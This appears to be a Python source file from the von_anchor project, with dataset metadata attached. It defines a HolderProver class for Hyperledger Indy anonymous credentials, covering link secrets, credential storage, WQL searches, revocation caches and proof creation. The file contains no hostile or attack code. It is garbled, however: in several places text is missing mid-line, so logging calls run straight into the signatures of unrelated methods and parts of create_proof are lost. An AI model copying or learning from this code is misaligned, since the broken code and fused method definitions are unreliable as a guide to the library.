Note that the close() call\n to set the anchor off-line extends all revocation cache registry delta entries to its time of execution:\n in this case, the intervals will all be single timestamps rather than (to, fro) pairs.\n\n Raise CacheIndex if proof request cites credential definition without corresponding\n content in cred def cache or revocation cache.\n\n :param cd_ids: list of credential definition identifiers\n :return: dict mapping revocable cred def ids to interval specifications to augment into cd_id2spec\n parameter for Verifier.build_proof_req_json(), and non-revocable cred def ids to empty dict; e.g.,\n\n ::\n\n {\n 'Vx4E82R17q...:3:CL:16:0': {\n 'interval': (1528111730, 1528115832)\n },\n 'R17v42T4pk...:3:CL:19:0': {},\n 'Z9ccax812j...:3:CL:27:0': {\n 'interval': (1528112408, 1528116008)\n },\n '9cHbp54C8n...:3:CL:37:0': {\n 'interval': 1528116426\n },\n '6caBcmLi33...:3:CL:41:0': {},\n ...\n }\n \"\"\"\n\n LOGGER.debug('HolderProver.offline_intervals >>> cd_ids: %s', cd_ids)\n\n rv = {}\n for cd_id in cd_ids:\n if not ok_cred_def_id(cd_id):\n LOGGER.debug('HolderProver.offline_intervals None:\n \"\"\"\n Create link secret (a.k.a. master secret) used in proofs by HolderProver.\n\n Raise any IndyError causing failure to set link secret in wallet.\n\n :param link_secret: label for link secret; indy-sdk uses label to generate link secret\n \"\"\"\n\n LOGGER.debug('HolderProver.create_link_secret >>> link_secret: %s', link_secret)\n\n try:\n await anoncreds.prover_create_master_secret(self.wallet.handle, link_secret)\n except IndyError as x_indy:\n if x_indy.error_code == ErrorCode.AnoncredsMasterSecretDuplicateNameError:\n LOGGER.info('HolderProver did not create link secret - it already exists')\n else:\n LOGGER.debug(\n 'HolderProver.create_link_secret: (str, str):\n \"\"\"\n Create credential request as HolderProver and store in wallet; return credential json and metadata json.\n\n Raise AbsentLinkSecret if link secret not set.\n\n :param cred_offer_json: credential offer json\n :param cd_id: credential definition identifier\n :return: cred request json and corresponding metadata json as created and stored in wallet\n \"\"\"\n\n LOGGER.debug('HolderProver.create_cred_req >>> cred_offer_json: %s, cd_id: %s', cred_offer_json, cd_id)\n\n if not ok_cred_def_id(cd_id):\n LOGGER.debug('HolderProver.create_cred_req str:\n \"\"\"\n Store cred in wallet as HolderProver, return its credential identifier as created in wallet.\n\n Raise AbsentTails if tails file not available for revocation registry for input credential.\n\n :param cred_json: credential json as HolderProver created\n :param cred_req_metadata_json: credential request metadata as HolderProver created via create_cred_req()\n :return: credential identifier within wallet\n \"\"\"\n\n LOGGER.debug(\n 'HolderProver.store_cred >>> cred_json: %s, cred_req_metadata_json: %s',\n cred_json,\n cred_req_metadata_json)\n\n cred = json.loads(cred_json)\n cred_def_json = await self.get_cred_def(cred['cred_def_id'])\n rr_id = cred['rev_reg_id']\n rrdef_json = None\n if rr_id:\n await self._sync_revoc(rr_id)\n rrdef_json = await self._get_rev_reg_def(rr_id)\n\n rv = await anoncreds.prover_store_credential(\n self.wallet.handle,\n None, # cred_id, let indy-sdk generate random uuid\n cred_req_metadata_json,\n cred_json,\n cred_def_json,\n rrdef_json)\n\n LOGGER.debug('HolderProver.store_cred <<< %s', rv)\n return rv\n\n async def load_cache(self, archive: bool = False) -> int:\n \"\"\"\n Load caches and archive enough to go offline and be 
able to generate proof\n on all credentials in wallet.\n\n Return timestamp (epoch seconds) of cache load event, also used as subdirectory\n for cache archives.\n\n :return: cache load event timestamp (epoch seconds)\n \"\"\"\n\n LOGGER.debug('HolderProver.load_cache >>> archive: %s', archive)\n\n rv = int(time())\n box_ids = json.loads(await self.get_box_ids_json())\n for s_id in box_ids['schema_id']:\n with SCHEMA_CACHE.lock:\n await self.get_schema(s_id)\n for cd_id in box_ids['cred_def_id']:\n with CRED_DEF_CACHE.lock:\n await self.get_cred_def(cd_id)\n for rr_id in box_ids['rev_reg_id']:\n await self._get_rev_reg_def(rr_id)\n with REVO_CACHE.lock:\n revo_cache_entry = REVO_CACHE.get(rr_id, None)\n if revo_cache_entry:\n try:\n await revo_cache_entry.get_delta_json(self._build_rr_delta_json, rv, rv)\n except ClosedPool:\n LOGGER.warning(\n 'Holder-Prover %s is offline from pool %s, cannot update revo cache reg delta for %s to %s',\n self.wallet.name,\n self.pool.name,\n rr_id,\n rv)\n\n if archive:\n Caches.archive(self.dir_cache)\n LOGGER.debug('HolderProver.load_cache <<< %s', rv)\n return rv\n\n async def get_box_ids_json(self) -> str:\n \"\"\"\n Return json object on lists of all unique box identifiers for credentials in wallet, as\n evidenced by tails directory content:\n * schema identifiers\n * credential definition identifiers\n * revocation registry identifiers.\n\n E.g.,\n\n ::\n\n {\n \"schema_id\": [\n \"R17v42T4pk...:2:tombstone:1.2\",\n \"9cHbp54C8n...:2:business:2.0\",\n ...\n ],\n \"cred_def_id\": [\n \"R17v42T4pk...:3:CL:19:0\",\n \"9cHbp54C8n...:3:CL:37:0\",\n ...\n ]\n \"rev_reg_id\": [\n \"R17v42T4pk...:4:R17v42T4pk...:3:CL:19:0:CL_ACCUM:0\",\n \"R17v42T4pk...:4:R17v42T4pk...:3:CL:19:0:CL_ACCUM:1\",\n \"9cHbp54C8n...:4:9cHbp54C8n...:3:CL:37:0:CL_ACCUM:0\",\n \"9cHbp54C8n...:4:9cHbp54C8n...:3:CL:37:0:CL_ACCUM:1\",\n \"9cHbp54C8n...:4:9cHbp54C8n...:3:CL:37:0:CL_ACCUM:2\",\n ...\n ]\n }\n\n :return: tuple of sets for schema ids, cred def ids, rev reg ids\n \"\"\"\n\n LOGGER.debug('HolderProver.get_box_ids_json >>>')\n\n rr_ids = {basename(link) for link in Tails.links(self._dir_tails)}\n\n un_rr_ids = set()\n for rr_id in rr_ids:\n if not json.loads(await self.get_cred_infos_by_q(json.dumps({'rev_reg_id': rr_id}), 1)):\n un_rr_ids.add(rr_id)\n rr_ids -= un_rr_ids\n\n cd_ids = {cd_id for cd_id in listdir(self._dir_tails)\n if isdir(join(self._dir_tails, cd_id)) and ok_cred_def_id(cd_id)}\n s_ids = set()\n for cd_id in cd_ids:\n s_ids.add(json.loads(await self.get_schema(cred_def_id2seq_no(cd_id)))['id'])\n\n un_cd_ids = set()\n for cd_id in cd_ids:\n if not json.loads(await self.get_cred_infos_by_q(json.dumps({'cred_def_id': cd_id}), 1)):\n un_cd_ids.add(cd_id)\n cd_ids -= un_cd_ids\n\n un_s_ids = set()\n for s_id in s_ids:\n if not json.loads(await self.get_cred_infos_by_q(json.dumps({'schema_id': s_id}), 1)):\n un_s_ids.add(s_id)\n s_ids -= un_s_ids\n\n rv = json.dumps({\n 'schema_id': list(s_ids),\n 'cred_def_id': list(cd_ids),\n 'rev_reg_id': list(rr_ids)\n })\n LOGGER.debug('HolderProver.get_box_ids_json <<< %s', rv)\n return rv\n\n async def get_cred_infos_by_q(self, query_json: str, limit: int = None) -> str:\n \"\"\"\n Return list of cred-infos from wallet by input WQL query;\n return synopses of all credentials for no query.\n\n The operation supports a subset of WQL; i.e.,\n\n ::\n\n query = {subquery}\n subquery = {subquery, ..., subquery} - WHERE subquery AND ... AND subquery\n subquery = $or: [{subquery},..., {subquery}] - WHERE subquery OR ... 
OR subquery\n subquery = $not: {subquery} - Where NOT (subquery)\n subquery = \"tagName\": tagValue - WHERE tagName == tagValue\n subquery = \"tagName\": {$in: [tagValue, ..., tagValue]} - WHERE tagName IN (tagValue, ..., tagValue)\n subquery = \"tagName\": {$neq: tagValue} - WHERE tagName != tagValue\n\n but not\n\n ::\n\n subquery = \"tagName\": {$gt: tagValue} - WHERE tagName > tagValue\n subquery = \"tagName\": {$gte: tagValue} - WHERE tagName >= tagValue\n subquery = \"tagName\": {$lt: tagValue} - WHERE tagName < tagValue\n subquery = \"tagName\": {$lte: tagValue} - WHERE tagName <= tagValue\n subquery = \"tagName\": {$like: tagValue} - WHERE tagName LIKE tagValue\n\n :param query_json: WQL query json\n :param limit: maximum number of results to return\n\n :return: cred-infos as json list; i.e.,\n\n ::\n\n [\n {\n \"referent\": string, # credential identifier in the wallet\n \"attrs\": {\n \"attr1\" : {\"raw\": \"value1\", \"encoded\": \"value1_as_int\" },\n \"attr2\" : {\"raw\": \"value2\", \"encoded\": \"value2_as_int\" },\n ...\n }\n \"schema_id\": string,\n \"cred_def_id\": string,\n \"rev_reg_id\": Optional,\n \"cred_rev_id\": Optional\n },\n ...\n ]\n\n \"\"\"\n\n LOGGER.debug('HolderProver.get_cred_infos_by_query >>> query_json: %s, limit: %s', query_json, limit)\n\n infos = []\n if limit and limit < 0:\n limit = None\n\n (handle, cardinality) = await anoncreds.prover_search_credentials(\n self.wallet.handle,\n json.dumps(canon_wql(json.loads(query_json)))) # indy-sdk requires attr name canonicalization\n chunk = min(cardinality, limit or cardinality, Wallet.DEFAULT_CHUNK) # heuristic\n if limit:\n cardinality = min(limit, cardinality)\n try:\n while len(infos) != cardinality:\n batch = json.loads(await anoncreds.prover_fetch_credentials(handle, chunk))\n infos.extend(batch)\n if len(batch) < cardinality:\n break\n if len(infos) != cardinality:\n LOGGER.warning('Credential search/limit indicated %s results but fetched %s', cardinality, len(infos))\n finally:\n await anoncreds.prover_close_credentials_search(handle)\n\n rv_json = json.dumps(infos)\n LOGGER.debug('HolderProver.get_cred_infos_by_query <<< %s', rv_json)\n return rv_json\n\n async def get_cred_infos_by_filter(self, filt: dict = None) -> str:\n \"\"\"\n Return cred-info (list) from wallet by input filter for\n schema identifier and/or credential definition identifier components;\n return info of all credentials for no filter.\n\n :param filt: indy-sdk filter for credentials; i.e.,\n\n ::\n\n {\n \"schema_id\": string, # optional\n \"schema_issuer_did\": string, # optional\n \"schema_name\": string, # optional\n \"schema_version\": string, # optional\n \"issuer_did\": string, # optional\n \"cred_def_id\": string # optional\n }\n\n :return: credential infos as json list; i.e.,\n\n ::\n [\n {\n \"referent\": string, # credential identifier in the wallet\n \"attrs\": {\n \"attr1\" : {\"raw\": \"value1\", \"encoded\": \"value1_as_int\" },\n \"attr2\" : {\"raw\": \"value2\", \"encoded\": \"value2_as_int\" },\n ...\n }\n \"schema_id\": string,\n \"cred_def_id\": string,\n \"rev_reg_id\": Optional,\n \"cred_rev_id\": Optional\n },\n ...\n ]\n\n \"\"\"\n\n LOGGER.debug('HolderProver.get_cred_infos_by_filter >>> filt: %s', filt)\n\n rv_json = await anoncreds.prover_get_credentials(self.wallet.handle, json.dumps(filt or {}))\n LOGGER.debug('HolderProver.get_cred_infos_by_filter <<< %s', rv_json)\n return rv_json\n\n async def get_cred_info_by_id(self, cred_id: str) -> str:\n \"\"\"\n Return cred-info from wallet by wallet 
credential identifier.\n\n Raise AbsentCred for no such credential.\n\n :param cred_id: credential identifier of interest\n :return: json with cred for input credential identifier\n\n :return: cred-info json; i.e.,\n\n ::\n\n {\n \"referent\": string, # credential identifier in the wallet\n \"attrs\": {\n \"attr1\" : {\"raw\": \"value1\", \"encoded\": \"value1_as_int\" },\n \"attr2\" : {\"raw\": \"value2\", \"encoded\": \"value2_as_int\" },\n ...\n }\n \"schema_id\": string,\n \"cred_def_id\": string,\n \"rev_reg_id\": Optional,\n \"cred_rev_id\": Optional\n }\n \"\"\"\n\n LOGGER.debug('HolderProver.get_cred_info_by_id >>> cred_id: %s', cred_id)\n\n try:\n rv_json = await anoncreds.prover_get_credential(self.wallet.handle, cred_id)\n except IndyError as x_indy: # no such cred\n if x_indy.error_code == ErrorCode.WalletItemNotFound:\n LOGGER.debug(\n 'HolderProver.get_cred_info_by_id: (Set[str], str):\n \"\"\"\n Get credentials from HolderProver wallet corresponding to proof request and\n filter criteria; return credential identifiers from wallet and credentials json.\n Return empty set and empty production for no such credentials.\n\n This method is deprecated - prefer get_cred_briefs_by_proof_req_q() as it filters in-wallet.\n\n :param proof_req_json: proof request json as Verifier creates; has entries for proof request's\n nonce, name, and version; plus credential's requested attributes, requested predicates. I.e.,\n\n ::\n\n {\n 'nonce': string, # indy-sdk makes no semantic specification on this value\n 'name': string, # indy-sdk makes no semantic specification on this value\n 'version': numeric-string, # indy-sdk makes no semantic specification on this value\n 'requested_attributes': {\n '': { # aka attr_referent, a proof-request local identifier\n 'name': string, # attribute name (matches case- and space-insensitively)\n 'restrictions' [ # optional\n {\n \"schema_id\": string, # optional\n \"schema_issuer_did\": string, # optional\n \"schema_name\": string, # optional\n \"schema_version\": string, # optional\n \"issuer_did\": string, # optional\n \"cred_def_id\": string # optional\n },\n {\n ... # if more than one restriction given, combined disjunctively (i.e., via OR)\n }\n ],\n 'non_revoked': { # optional - indy-sdk ignores when getting creds from wallet\n 'from': int, # optional, epoch seconds\n 'to': int # optional, epoch seconds\n }\n },\n ...\n },\n 'requested_predicates': {\n '': { # aka predicate_referent, a proof-request local predicate identifier\n 'name': string, # attribute name (matches case- and space-insensitively)\n 'p_type': '>=',\n 'p_value': int, # predicate value\n 'restrictions': [ # optional\n {\n \"schema_id\": string, # optional\n \"schema_issuer_did\": string, # optional\n \"schema_name\": string, # optional\n \"schema_version\": string, # optional\n \"issuer_did\": string, # optional\n \"cred_def_id\": string # optional\n },\n {\n ... # if more than one restriction given, combined disjunctively (i.e., via OR)\n }\n ],\n 'non_revoked': { # optional - indy-sdk ignores when getting creds from wallet\n 'from': int, # optional, epoch seconds\n 'to': int # optional, epoch seconds\n }\n },\n ...\n },\n 'non_revoked': { # optional - indy-sdk ignores when getting creds from wallet\n 'from': Optional,\n 'to': Optional\n }\n }\n\n :param filt: filter for matching attribute-value pairs and predicates; dict mapping each\n cred def id to dict (specify empty dict or none for no filter, matching all)\n mapping attributes to values to match or compare. 
E.g.,\n\n ::\n\n {\n 'Vx4E82R17q...:3:CL:16:0': {\n 'attr-match': {\n 'name': 'Alex',\n 'sex': 'M',\n 'favouriteDrink': None\n },\n 'minima': { # if both attr-match and minima present, combined conjunctively (i.e., via AND)\n 'favouriteNumber' : 10,\n 'score': '100' # nicety: implementation converts to int for caller\n },\n },\n 'R17v42T4pk...:3:CL:19:0': {\n 'attr-match': {\n 'height': 175,\n 'birthdate': '1975-11-15' # combined conjunctively (i.e., via AND)\n }\n },\n 'Z9ccax812j...:3:CL:27:0': {\n 'attr-match': {} # match all attributes on this cred def\n }\n ...\n }\n\n :param filt_dflt_incl: whether to include (True) all credentials from wallet that filter does not\n identify by cred def, or to exclude (False) all such credentials\n :return: tuple with (set of referents, creds json for input proof request);\n empty set and empty production for no such credential\n \"\"\"\n\n LOGGER.debug('HolderProver.get_creds >>> proof_req_json: %s, filt: %s', proof_req_json, filt)\n\n if filt is None:\n filt = {}\n rv = None\n creds_json = await anoncreds.prover_get_credentials_for_proof_req(self.wallet.handle, proof_req_json)\n creds = json.loads(creds_json)\n cred_ids = set()\n\n if filt:\n for cd_id in filt:\n try:\n json.loads(await self.get_cred_def(cd_id))\n except AbsentCredDef:\n LOGGER.warning('HolderProver.get_creds: ignoring filter criterion, no cred def on %s', cd_id)\n filt.pop(cd_id)\n\n for briefs in {**creds['attrs'], **creds['predicates']}.values():\n for brief in briefs: # brief is a dict in a list of dicts\n cred_info = brief['cred_info']\n if filt:\n cred_cd_id = cred_info['cred_def_id']\n if cred_cd_id not in filt:\n if filt_dflt_incl:\n cred_ids.add(cred_info['referent'])\n continue\n if 'attr-match' in (filt[cred_cd_id] or {}): # maybe filt[cred_cd_id]: None\n if not {k: str(filt[cred_cd_id].get('attr-match', {})[k])\n for k in filt[cred_cd_id].get('attr-match', {})}.items() <= cred_info['attrs'].items():\n continue\n if 'minima' in (filt[cred_cd_id] or {}): # maybe filt[cred_cd_id]: None\n minima = filt[cred_cd_id].get('minima', {})\n try:\n if any((attr not in cred_info['attrs'])\n or (int(cred_info['attrs'][attr]) < int(minima[attr]))\n for attr in minima):\n continue\n except ValueError:\n continue # int conversion failed - reject candidate\n cred_ids.add(cred_info['referent'])\n else:\n cred_ids.add(cred_info['referent'])\n\n if filt:\n creds = json.loads(prune_creds_json(creds, cred_ids))\n\n rv = (cred_ids, json.dumps(creds))\n LOGGER.debug('HolderProver.get_creds <<< %s', rv)\n return rv\n\n async def get_cred_briefs_by_proof_req_q(\n self,\n proof_req_json: str,\n x_queries_json: str = None) -> (Set[str], str):\n \"\"\"\n Return cred-briefs from wallet by proof request and WQL queries by\n proof request referent. Return no cred-briefs no WQL query - util.proof_req2wql_all()\n builds WQL to retrieve all cred-briefs for some or all cred-def-ids in a proof request.\n\n For each WQL query on an item referent, indy-sdk takes the WQL and the attribute name\n and restrictions (e.g., cred def id, schema id, etc.) from its referent. 
Note that\n util.proof_req_attr_referents() maps cred defs and attr names to proof req item referents,\n bridging the gap between attribute names and their corresponding item referents.\n\n :param proof_req_json: proof request as per get_creds(); e.g.,\n\n ::\n\n {\n \"nonce\": \"1532429687\",\n \"name\": \"proof_req\",\n \"version\": \"0.0\",\n \"requested_predicates\": {},\n \"requested_attributes\": {\n \"17_name_uuid\": {\n \"restrictions\": [\n {\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n ],\n \"name\": \"name\"\n },\n \"17_thing_uuid\": {\n \"restrictions\": [\n {\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n ],\n \"name\": \"thing\"\n }\n }\n }\n\n :param x_queries_json: json list of extra queries to apply to proof request attribute and predicate\n referents; e.g.,\n\n ::\n {\n \"17_thing_uuid\": { # require attr presence on name 'thing', cred def id from proof req above\n \"$or\": [\n {\n \"attr::name::value\": \"J.R. 'Bob' Dobbs\"\n },\n {\n \"attr::thing::value\": \"slack\"\n },\n ]\n },\n }\n\n :return: tuple with set of wallet cred ids, json list of cred briefs;\n e.g.,\n\n ::\n (\n {\n 'b42ce5bc-b690-43cd-9493-6fe86ad25e85',\n 'd773434a-0080-4e3e-a03b-f2033eae7d75'\n },\n '[\n {\n \"interval\": null,\n \"cred_info\": {\n \"schema_id\": \"LjgpST2rjsoxYegQDRm7EL:2:non-revo:1.0\",\n \"rev_reg_id\": null,\n \"attrs\": {\n \"name\": \"Chicken Hawk\",\n \"thing\": \"chicken\"\n },\n \"cred_rev_id\": null,\n \"referent\": \"d773434a-0080-4e3e-a03b-f2033eae7d75\",\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n },\n {\n \"interval\": null,\n \"cred_info\": {\n \"schema_id\": \"LjgpST2rjsoxYegQDRm7EL:2:non-revo:1.0\",\n \"rev_reg_id\": null,\n \"attrs\": {\n \"name\": \"J.R. \\\"Bob\\\" Dobbs\",\n \"thing\": \"slack\"\n },\n \"cred_rev_id\": null,\n \"referent\": \"b42ce5bc-b690-43cd-9493-6fe86ad25e85\",\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n }\n ]'\n }\n \"\"\"\n\n LOGGER.debug(\n ('HolderProver.get_cred_briefs_by_proof_req_query >>> proof_req_json: %s, x_queries_json: %s'),\n proof_req_json,\n x_queries_json)\n\n rv = None\n\n x_queries = json.loads(x_queries_json or '{}')\n for k in x_queries:\n x_queries[k] = canon_wql(x_queries[k]) # indy-sdk requires attr name canonicalization\n\n handle = await anoncreds.prover_search_credentials_for_proof_req(\n self.wallet.handle,\n proof_req_json,\n json.dumps(x_queries) if x_queries else None)\n briefs = []\n cred_ids = set()\n proof_req = json.loads(proof_req_json)\n\n try:\n for item_referent in (x_queries\n if x_queries\n else {**proof_req['requested_attributes'], **proof_req['requested_predicates']}):\n count = Wallet.DEFAULT_CHUNK\n while count == Wallet.DEFAULT_CHUNK:\n fetched = json.loads(await anoncreds.prover_fetch_credentials_for_proof_req(\n handle,\n item_referent,\n Wallet.DEFAULT_CHUNK))\n count = len(fetched)\n for brief in fetched:\n if brief['cred_info']['referent'] not in cred_ids:\n cred_ids.add(brief['cred_info']['referent'])\n briefs.append(brief)\n finally:\n await anoncreds.prover_close_credentials_search_for_proof_req(handle)\n\n rv = (cred_ids, json.dumps(briefs))\n LOGGER.debug('HolderProver.get_cred_briefs_by_proof_req_query <<< %s', rv)\n return rv\n\n\n async def create_proof(self, proof_req: dict, creds: Union[dict, list], requested_creds: dict) -> str:\n \"\"\"\n Create proof as HolderProver.\n\n Raise:\n * AbsentLinkSecret if link secret not set\n * CredentialFocus on attempt to create proof on no creds or multiple creds for a credential 
definition\n * AbsentTails if missing required tails file\n * BadRevStateTime if a timestamp for a revocation registry state in the proof request\n occurs before revocation registry creation\n * IndyError for any other indy-sdk error.\n * AbsentInterval if creds missing non-revocation interval, but cred def supports revocation\n\n :param proof_req: proof request as per get_creds() above\n :param creds: credentials to prove: indy-sdk creds structure or list of cred-briefs\n :param requested_creds: data structure with self-attested attribute info, requested attribute info\n and requested predicate info, assembled from get_creds() and filtered for content of interest. I.e.,\n\n ::\n\n {\n 'self_attested_attributes': {},\n 'requested_attributes': {\n 'attr0_uuid': {\n 'cred_id': string,\n 'timestamp': integer, # for revocation state\n 'revealed': bool\n },\n ...\n },\n 'requested_predicates': {\n 'predicate0_uuid': {\n 'cred_id': string,\n 'timestamp': integer # for revocation state\n }\n }\n }\n\n :return: proof json\n \"\"\"\n\n LOGGER.debug(\n 'HolderProver.create_proof >>> proof_req: %s, creds: %s, requested_creds: %s',\n proof_req,\n creds,\n requested_creds)\n\n self._assert_link_secret('create_proof')\n\n if isinstance(creds, dict):\n x_uuids = [attr_uuid for attr_uuid in creds['attrs'] if len(creds['attrs'][attr_uuid]) != 1]\n if x_uuids:\n LOGGER.debug('HolderProver.create_proof: int(time()):\n LOGGER.debug(\n 'HolderProver.create_proof: str:\n \"\"\"\n Close and delete HolderProver wallet, then create and open a replacement on prior link secret.\n Note that this operation effectively destroys private keys for credential definitions. Its\n intended use is primarily for testing and demonstration.\n\n Raise AbsentLinkSecret if link secret not set.\n\n :return: wallet name\n \"\"\"\n\n LOGGER.debug('HolderProver.reset_wallet >>>')\n\n self._assert_link_secret('reset_wallet')\n\n seed = self.wallet._seed\n wallet_name = self.wallet.name\n wallet_auto_remove = self.wallet.auto_remove\n wallet_cfg = self.wallet.cfg\n wallet_cfg['auto-remove'] = wallet_auto_remove\n wallet_xtype = self.wallet.xtype\n wallet_access_creds = self.wallet.access_creds\n\n await self.wallet.close()\n if not self.wallet.auto_remove:\n await self.wallet.remove()\n self.wallet = await Wallet(\n seed,\n wallet_name,\n wallet_xtype,\n wallet_cfg,\n wallet_access_creds).create()\n await self.wallet.open()\n\n await self.create_link_secret(self._link_secret) # carry over link secret to new wallet\n\n rv = self.wallet.name\n LOGGER.debug('HolderProver.reset_wallet <<< %s', rv)\n return rv\n", "repo_name": "AlwaysFurther/von_anchor", "sub_path": "von_anchor/anchor/holder_prover.py", "file_name": "holder_prover.py", "file_ext": "py", "file_size_in_byte": 58368, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "von_anchor.anchor.base._BaseAnchor", "line_number": 43, "usage_type": "name"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 50, "usage_type": "name"}, {"api_name": "von_anchor.nodepool.NodePool", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 72, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 73, "usage_type": "call"}, {"api_name": "von_anchor.validate_config.validate_config", "line_number": 76, "usage_type": "call"}, {"api_name": 
"os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 78, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentLinkSecret", "line_number": 92, "usage_type": "call"}, {"api_name": "von_anchor.validate_config.validate_config", "line_number": 113, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 138, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 140, "usage_type": "call"}, {"api_name": "von_anchor.util.rev_reg_id2cred_def_id_tag", "line_number": 142, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 145, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 146, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 149, "usage_type": "call"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 150, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 153, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 153, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.get", "line_number": 154, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 154, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails", "line_number": 158, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentTails", "line_number": 159, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 162, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.dir", "line_number": 162, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 162, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 163, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentTails", "line_number": 165, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.associate", "line_number": 166, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 166, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails", "line_number": 167, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 170, "usage_type": "name"}, {"api_name": "von_anchor.cache.RevoCacheEntry", "line_number": 170, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 172, "usage_type": "name"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 199, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 201, "usage_type": "call"}, {"api_name": "indy.ledger.build_get_revoc_reg_delta_request", "line_number": 206, "usage_type": "call"}, {"api_name": "indy.ledger", "line_number": 206, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 208, "usage_type": "call"}, {"api_name": "indy.ledger.parse_get_revoc_reg_delta_response", "line_number": 212, "usage_type": "call"}, {"api_name": "indy.ledger", "line_number": 212, "usage_type": "name"}, {"api_name": "indy.error.IndyError", "line_number": 213, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentRevReg", "line_number": 215, "usage_type": "call"}, {"api_name": "von_anchor.error.BadRevStateTime", "line_number": 221, "usage_type": "call"}, {"api_name": "indy.anoncreds.issuer_merge_revocation_registry_deltas", "line_number": 224, "usage_type": "call"}, {"api_name": "indy.anoncreds", 
"line_number": 224, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 225, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 302, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 304, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 307, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 308, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 358, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 372, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 374, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.dir", "line_number": 376, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 376, "usage_type": "name"}, {"api_name": "von_anchor.cache.Caches.parse", "line_number": 393, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches", "line_number": 393, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 395, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 395, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 396, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches.purge_archives", "line_number": 413, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches", "line_number": 413, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 416, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 416, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 417, "usage_type": "call"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 420, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 435, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 435, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 436, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 438, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 438, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 438, "usage_type": "name"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 478, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 480, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 483, "usage_type": "call"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 484, "usage_type": "name"}, {"api_name": "von_anchor.error.CacheIndex", "line_number": 486, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 490, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 490, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.dflt_interval", "line_number": 491, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 491, "usage_type": "name"}, {"api_name": "von_anchor.error.CacheIndex", "line_number": 496, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_create_master_secret", "line_number": 515, "usage_type": "call"}, {"api_name": "indy.anoncreds", 